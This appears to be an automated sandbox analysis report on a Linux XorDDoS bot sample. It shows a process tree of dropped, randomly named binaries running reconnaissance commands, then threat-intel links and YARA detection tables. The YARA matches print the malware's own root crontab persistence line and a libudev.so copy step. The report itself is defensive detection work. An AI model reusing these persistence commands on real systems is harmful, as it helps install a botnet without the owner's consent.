snluqxjnyb (PID: 6565, Parent: 6564, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "cd /etc" 6261

snluqxjnyb New Fork (PID: 6569, Parent: 6565)

UDMp3dZ7nc.elf New Fork (PID: 6567, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6568, Parent: 6567)

snluqxjnyb (PID: 6568, Parent: 6567, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "grep \"A\"" 6261

snluqxjnyb New Fork (PID: 6572, Parent: 6568)

UDMp3dZ7nc.elf New Fork (PID: 6570, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6571, Parent: 6570)

snluqxjnyb (PID: 6571, Parent: 6570, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb top 6261

snluqxjnyb New Fork (PID: 6573, Parent: 6571)

UDMp3dZ7nc.elf New Fork (PID: 6576, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6577, Parent: 6576)

rfdcbxuezd (PID: 6577, Parent: 6576, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "ps -ef" 6261

rfdcbxuezd New Fork (PID: 6578, Parent: 6577)

UDMp3dZ7nc.elf New Fork (PID: 6579, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6580, Parent: 6579)

rfdcbxuezd (PID: 6580, Parent: 6579, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cat resolv.conf" 6261

rfdcbxuezd New Fork (PID: 6582, Parent: 6580)

UDMp3dZ7nc.elf New Fork (PID: 6581, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6583, Parent: 6581)

rfdcbxuezd (PID: 6583, Parent: 6581, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cd /etc" 6261

rfdcbxuezd New Fork (PID: 6586, Parent: 6583)

UDMp3dZ7nc.elf New Fork (PID: 6584, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6585, Parent: 6584)

rfdcbxuezd (PID: 6585, Parent: 6584, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd "cd /etc" 6261

rfdcbxuezd New Fork (PID: 6589, Parent: 6585)

UDMp3dZ7nc.elf New Fork (PID: 6587, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6588, Parent: 6587)

rfdcbxuezd (PID: 6588, Parent: 6587, MD5: bcf7ec16fced4436fe9502643e9c86a8) Arguments: /usr/bin/rfdcbxuezd id 6261

rfdcbxuezd New Fork (PID: 6590, Parent: 6588)

UDMp3dZ7nc.elf New Fork (PID: 6593, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6594, Parent: 6593)

nqjbkvhncc (PID: 6594, Parent: 6593, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc "cat resolv.conf" 6261

nqjbkvhncc New Fork (PID: 6595, Parent: 6594)

UDMp3dZ7nc.elf New Fork (PID: 6596, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6597, Parent: 6596)

nqjbkvhncc (PID: 6597, Parent: 6596, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc "sleep 1" 6261

nqjbkvhncc New Fork (PID: 6600, Parent: 6597)

UDMp3dZ7nc.elf New Fork (PID: 6598, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6599, Parent: 6598)

nqjbkvhncc (PID: 6599, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc gnome-terminal 6261

nqjbkvhncc New Fork (PID: 6605, Parent: 6599)

UDMp3dZ7nc.elf New Fork (PID: 6601, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6602, Parent: 6601)

nqjbkvhncc (PID: 6602, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc gnome-terminal 6261

nqjbkvhncc New Fork (PID: 6606, Parent: 6602)

UDMp3dZ7nc.elf New Fork (PID: 6603, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6604, Parent: 6603)

nqjbkvhncc (PID: 6604, Parent: 1860, MD5: 19502630540ed5c815ecc4fe6cd2d733) Arguments: /usr/bin/nqjbkvhncc ifconfig 6261

nqjbkvhncc New Fork (PID: 6607, Parent: 6604)

UDMp3dZ7nc.elf New Fork (PID: 6611, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6612, Parent: 6611)

xzmsvqaqiz (PID: 6612, Parent: 6611, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "ls -la" 6261

xzmsvqaqiz New Fork (PID: 6617, Parent: 6612)

UDMp3dZ7nc.elf New Fork (PID: 6613, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6614, Parent: 6613)

xzmsvqaqiz (PID: 6614, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "sleep 1" 6261

xzmsvqaqiz New Fork (PID: 6621, Parent: 6614)

UDMp3dZ7nc.elf New Fork (PID: 6615, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6616, Parent: 6615)

xzmsvqaqiz (PID: 6616, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "ps -ef" 6261

xzmsvqaqiz New Fork (PID: 6623, Parent: 6616)

UDMp3dZ7nc.elf New Fork (PID: 6618, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6619, Parent: 6618)

xzmsvqaqiz (PID: 6619, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz "grep \"A\"" 6261

xzmsvqaqiz New Fork (PID: 6624, Parent: 6619)

UDMp3dZ7nc.elf New Fork (PID: 6620, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6622, Parent: 6620)

xzmsvqaqiz (PID: 6622, Parent: 1860, MD5: 9f80890f560ed6066115f1895d821440) Arguments: /usr/bin/xzmsvqaqiz ifconfig 6261

xzmsvqaqiz New Fork (PID: 6625, Parent: 6622)

UDMp3dZ7nc.elf New Fork (PID: 6629, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6630, Parent: 6629)

bbdupdfrbl (PID: 6630, Parent: 6629, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "ifconfig eth0" 6261

bbdupdfrbl New Fork (PID: 6635, Parent: 6630)

UDMp3dZ7nc.elf New Fork (PID: 6631, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6632, Parent: 6631)

bbdupdfrbl (PID: 6632, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl who 6261

bbdupdfrbl New Fork (PID: 6638, Parent: 6632)

UDMp3dZ7nc.elf New Fork (PID: 6633, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6634, Parent: 6633)

bbdupdfrbl (PID: 6634, Parent: 6633, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "echo \"find\"" 6261

bbdupdfrbl New Fork (PID: 6641, Parent: 6634)

UDMp3dZ7nc.elf New Fork (PID: 6636, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6637, Parent: 6636)

bbdupdfrbl (PID: 6637, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl whoami 6261

bbdupdfrbl New Fork (PID: 6642, Parent: 6637)

UDMp3dZ7nc.elf New Fork (PID: 6639, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6640, Parent: 6639)

bbdupdfrbl (PID: 6640, Parent: 1860, MD5: ce8ed5c0103d476aae51c2e02825f9cd) Arguments: /usr/bin/bbdupdfrbl "route -n" 6261

bbdupdfrbl New Fork (PID: 6643, Parent: 6640)

UDMp3dZ7nc.elf New Fork (PID: 6646, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6647, Parent: 6646)

lqmgtequuz (PID: 6647, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz su 6261

lqmgtequuz New Fork (PID: 6649, Parent: 6647)

UDMp3dZ7nc.elf New Fork (PID: 6648, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6650, Parent: 6648)

lqmgtequuz (PID: 6650, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "ls -la" 6261

lqmgtequuz New Fork (PID: 6653, Parent: 6650)

UDMp3dZ7nc.elf New Fork (PID: 6651, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6652, Parent: 6651)

lqmgtequuz (PID: 6652, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "grep \"A\"" 6261

lqmgtequuz New Fork (PID: 6659, Parent: 6652)

UDMp3dZ7nc.elf New Fork (PID: 6654, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6655, Parent: 6654)

lqmgtequuz (PID: 6655, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "ps -ef" 6261

lqmgtequuz New Fork (PID: 6658, Parent: 6655)

UDMp3dZ7nc.elf New Fork (PID: 6656, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6657, Parent: 6656)

lqmgtequuz (PID: 6657, Parent: 1860, MD5: 89dc58010dc1112c748954232f0e45bc) Arguments: /usr/bin/lqmgtequuz "echo \"find\"" 6261

lqmgtequuz New Fork (PID: 6660, Parent: 6657)

UDMp3dZ7nc.elf New Fork (PID: 6665, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6666, Parent: 6665)

vzezokfask (PID: 6666, Parent: 6665, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "echo \"find\"" 6261

vzezokfask New Fork (PID: 6670, Parent: 6666)

UDMp3dZ7nc.elf New Fork (PID: 6667, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6668, Parent: 6667)

vzezokfask (PID: 6668, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask sh 6261

vzezokfask New Fork (PID: 6675, Parent: 6668)

UDMp3dZ7nc.elf New Fork (PID: 6669, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6671, Parent: 6669)

vzezokfask (PID: 6671, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "ifconfig eth0" 6261

vzezokfask New Fork (PID: 6677, Parent: 6671)

UDMp3dZ7nc.elf New Fork (PID: 6672, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6673, Parent: 6672)

vzezokfask (PID: 6673, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask ls 6261

vzezokfask New Fork (PID: 6678, Parent: 6673)

UDMp3dZ7nc.elf New Fork (PID: 6674, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6676, Parent: 6674)

vzezokfask (PID: 6676, Parent: 1860, MD5: 41de595dc0b051eb3e53023ef6d8b788) Arguments: /usr/bin/vzezokfask "ps -ef" 6261

vzezokfask New Fork (PID: 6679, Parent: 6676)

UDMp3dZ7nc.elf New Fork (PID: 6682, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6683, Parent: 6682)

skjzlhozvl (PID: 6683, Parent: 6682, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl "route -n" 6261

skjzlhozvl New Fork (PID: 6688, Parent: 6683)

UDMp3dZ7nc.elf New Fork (PID: 6684, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6685, Parent: 6684)

skjzlhozvl (PID: 6685, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl who 6261

skjzlhozvl New Fork (PID: 6693, Parent: 6685)

UDMp3dZ7nc.elf New Fork (PID: 6686, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6687, Parent: 6686)

skjzlhozvl (PID: 6687, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl "route -n" 6261

skjzlhozvl New Fork (PID: 6694, Parent: 6687)

UDMp3dZ7nc.elf New Fork (PID: 6689, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6690, Parent: 6689)

skjzlhozvl (PID: 6690, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl uptime 6261

skjzlhozvl New Fork (PID: 6695, Parent: 6690)

UDMp3dZ7nc.elf New Fork (PID: 6691, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6692, Parent: 6691)

skjzlhozvl (PID: 6692, Parent: 1860, MD5: 4d269bc77499545c56e853c6f0db0bb4) Arguments: /usr/bin/skjzlhozvl uptime 6261

skjzlhozvl New Fork (PID: 6696, Parent: 6692)

systemd New Fork (PID: 6273, Parent: 6272)

snapd-env-generator (PID: 6273, Parent: 6272, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
UDMp3dZ7nc.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
UDMp3dZ7nc.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
UDMp3dZ7nc.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
UDMp3dZ7nc.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/sosfbbrzmx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/sosfbbrzmx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/sosfbbrzmx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/sosfbbrzmx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/uhjkqkcgma	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uhjkqkcgma	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/uhjkqkcgma	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/uhjkqkcgma	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vnihfmehfy	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/vnihfmehfy	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/vnihfmehfy	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/vnihfmehfy	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/oigyzaiygp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/oigyzaiygp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/oigyzaiygp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/oigyzaiygp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/otlzwyqefc	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/otlzwyqefc	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/otlzwyqefc	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ksagqhmoao	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/eqoogeqyds	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/otlzwyqefc	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ksagqhmoao	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ksagqhmoao	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/eqoogeqyds	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/eqoogeqyds	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ksagqhmoao	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/eqoogeqyds	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wutujskjnm	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wutujskjnm	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wutujskjnm	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wutujskjnm	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/qxzsiorokf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/qxzsiorokf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/qxzsiorokf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/qxzsiorokf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/gphlkawhxw	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/gphlkawhxw	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/gphlkawhxw	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/gphlkawhxw	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/uzqdvpyngy	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uzqdvpyngy	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/uzqdvpyngy	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/uzqdvpyngy	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
